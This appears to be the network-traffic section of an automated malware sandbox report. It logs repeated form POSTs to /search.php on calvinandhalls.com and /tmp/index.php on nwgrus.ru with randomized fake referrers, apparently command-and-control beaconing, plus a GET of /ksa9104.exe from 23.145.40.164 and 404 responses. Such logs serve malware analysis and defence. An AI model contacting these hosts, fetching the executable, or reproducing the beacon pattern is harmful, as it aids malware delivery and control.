Source: global traffic HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://ujkayjvdqul.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 250Host: calvinandhalls.com
Source: global traffic HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://eycfcgwvugnqxe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 215Host: calvinandhalls.com
Source: global traffic HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://uggcvdvmydqspblb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 183Host: calvinandhalls.com
Source: global traffic HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://ipavwsqiqelj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: calvinandhalls.com
Source: global traffic HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://bullivvhvmuc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 258Host: calvinandhalls.com
Source: global traffic HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://kheehglmstrxeo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 213Host: calvinandhalls.com
Source: global traffic HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://jhcyskiuwnguyo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: calvinandhalls.com
Source: global traffic HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://frkpgrboqqf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 155Host: calvinandhalls.com
Source: global traffic HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://atbscwbcvtybbp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 292Host: calvinandhalls.com
Source: global traffic HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://odhashqreyopr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: calvinandhalls.com
Source: global traffic HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://tbgynejneafdk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 299Host: calvinandhalls.com
Source: global traffic HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://mqhahmibwlnntq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 283Host: calvinandhalls.com
Source: global traffic HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://xdrrfipvxfhn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 340Host: calvinandhalls.com
Source: global traffic HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://vgsfrcxsvaoca.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 327Host: calvinandhalls.com
Source: global traffic HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://msqyarjhmbx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 238Host: calvinandhalls.com
Source: global traffic HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://calvinandhalls.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 501Host: calvinandhalls.com
Source: global traffic HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://cmiubtivnasjoudw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
Source: global traffic HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://jiwfwlcanebf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
Source: global traffic HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://lymwoggejifjeow.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
Source: global traffic HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://sobtugvkyrrny.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dwgdbsxrjnnesjc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: nwgrus.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jdfqkdrqtsch.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 324Host: nwgrus.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yjbjsjjdituglvfr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 268Host: nwgrus.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ifilpxcdnwgbgge.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 117Host: nwgrus.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ciwodbbyumgi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 300Host: nwgrus.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uctglujhyyn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 177Host: nwgrus.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://semcigauupb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 145Host: nwgrus.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mjkmetahcah.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: nwgrus.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fkvpkdvartxwe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 304Host: nwgrus.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hqcqhgjcmtgx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: nwgrus.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uwtleoojxrcvopte.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 310Host: nwgrus.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://puvaafsthshrcum.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: nwgrus.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dvyvdbiqyxa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: nwgrus.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vjfbbnssutajqo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 356Host: nwgrus.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://icltdtwcxuda.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 242Host: nwgrus.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hxmpwtofksapy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 355Host: nwgrus.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://prhupsyenaon.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 322Host: nwgrus.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pjcbyveqviwch.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 314Host: nwgrus.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uppdgnyegjvory.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 146Host: nwgrus.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ldpymxrfawi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 263Host: nwgrus.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ucebrpsptgm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 184Host: nwgrus.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wvyisbukobdqdei.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 330Host: nwgrus.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kymcsuriadoaei.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 266Host: nwgrus.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wypsmdkfdcadpn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 254Host: nwgrus.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://erjyaeignxsu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 334Host: nwgrus.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mcjitqwtqilsk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 305Host: nwgrus.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cweiuociftg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 274Host: nwgrus.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ncmvgkvwguax.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 181Host: nwgrus.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://trelswnfdtmn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 130Host: nwgrus.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mltvlrabpgii.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 226Host: nwgrus.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wfqqxnqsmcop.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 251Host: nwgrus.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gottjuiosjatm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 281Host: nwgrus.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sgntleolvdwaddkp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 195Host: nwgrus.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jevspcjflxdrnyqd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 129Host: nwgrus.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xvjdoetwalpqj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 153Host: nwgrus.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rsomhlsnqixrhe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: nwgrus.ru
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: global traffic HTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
Source: global traffic DNS traffic detected: DNS query: nwgrus.ru
Source: global traffic DNS traffic detected: DNS query: calvinandhalls.com
Source: unknown HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://ilsdlpkysrci.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 171Host: calvinandhalls.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 21:28:27 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Connection: closeTransfer-Encoding: chunked
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 21:28:40 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Connection: closeTransfer-Encoding: chunked
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 21:28:41 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 409Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 21:28:50 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 409Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 21:30:05 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 21:30:25 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 21:30:36 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 21:30:56 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 86 ea Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
